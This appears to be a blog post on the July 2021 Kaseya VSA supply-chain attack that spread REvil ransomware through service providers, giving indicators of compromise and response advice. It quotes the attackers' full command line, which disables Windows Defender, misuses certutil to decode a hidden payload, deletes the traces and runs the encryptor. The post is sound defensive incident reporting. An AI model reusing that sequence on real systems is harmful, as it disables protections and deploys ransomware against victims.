Updated 7/2/2021 - 17:51 ET
Shortly after 2PM on Friday July 2, 2021 administrators of the Kaseya VSA (Remote Monitoring and Management) Software as a Service began to experience issues where users were locked out and customer agents were receiving scripts to deploy ransomware. By 3PM Kaseya had shut down and placed all cloud servers in maintenance mode and has put out communication for all self-hosted VSA partners to shut down their servers.
At least 8 Technology Service Providers have confirmed that thousands of their customers has now been encrypted by a REvil ransomware as a service affiliate. Over the next 24-48 hours both the number of service providers and the end customers affected by this is expected to grow.
If you are a Kaseya VSA provider some signs of the attack are:
Ransomware encryptor is dropped toc:\kworking\agent.exe
The VSA procedure is named "Kaseya VSA Agent Hot-fix”
At least two tasks run the following:"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
What about Multi-Factor Authentication (MFA)?
A number of the service providers impacted by this have also acknowledged that multi-factor authentication was utilized for all accounts and the security breach was still able to occur. This points to a supply-chain style zero-day vulnerability within the Kaseya VSA platform. This is an important fact as MFA has become a security baseline at preventing attacks and securing environments.
What is happening?
Once a service provider's Remote Monitoring and Management toolset is corrupted, users have reported that all users to the Kaseya VSA platform are locked out and then agent will drop a certificate file, named agent.crt, to the c:\kworking folder, which is used for updates to VSA. A Powershell command is then launched to decode the agent.crt file using the legitimate Microsoft Windows certutil.exe and extra an agent.exe file to the same folder.
The new agent.exe is signed using a certificate from PB03 Transport LTD and includes an embedded MsMpEng.exe and MPSvc.dll, and the .dll file is the REvil data encryptor file, while the MsMPEng.exe is used to launch the DLL and encrypt the drive.
The Demand!
A sample of the REvil ransomware used in one of these attacks has been shared online, but it is not certain the same demand will apply to all victims. For the sample posted online the ransomware gang is demanding a $5 Million ransom to receive the decryption key. You can view the configuration file dump here.
What's Next?
At the speed that files were encrypted after user accounts to Kaseya VSA could lead to promise that files may not have been exported before encryption, however ransomware has trended more and more to the export then encrypt method so if your data is encrypted I would assume your data may have been breached and you should review your breach notification plans.
The service providers that were impacted will work tirelessly to restore both their own and their client systems likely working all hands on deck all weekend long, Kaseya will perform similar as getting the platform back online and patching the security flaws are the top two priorities to maintaining their customer base.
While the attack has only started roughly 4 hours ago now, it will be days or weeks until the full scope is understood.